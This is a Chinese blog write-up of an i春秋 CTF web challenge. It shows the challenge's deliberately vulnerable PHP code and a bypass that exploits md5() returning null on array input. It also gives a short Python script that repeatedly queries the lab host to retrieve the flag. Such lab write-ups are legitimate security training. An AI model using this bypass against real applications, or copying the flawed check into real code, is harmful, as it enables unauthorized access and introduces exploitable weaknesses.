i春秋-web-爆破-3

博客围绕代码审计展开,发现可手动爆破,依据页面返回进行十次请求。由于md5不能处理数组,可使用数组绕过,如?value[0]=e&value[1]=a ,还可编写python脚本实现。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
  $_SESSION['nums'] = 0;
  $_SESSION['time'] = time();
  $_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){
  session_destroy();
}

$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $str_rands;
}

if($_SESSION['nums']>=10){
  echo $flag;
}

show_source(__FILE__);
?>

代码审计,发现可以手动爆破,滑稽,然后根据页面返回,请求十次
md5不能处理数组,所以可以用数组绕过
?value[0]=e&value[1]=a
也可以写个脚本py

import requests
s=requests.session()

url='http://0993a985319446889263ad893181352036df859756b6405d.game.ichunqiu.com/?value[]='

a=s.get(url+'ea')
for i in range(11):
    b=s.get(url+a.text[:2])
    a=b
    if 'flag{' in a.text:
        print(a.text)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值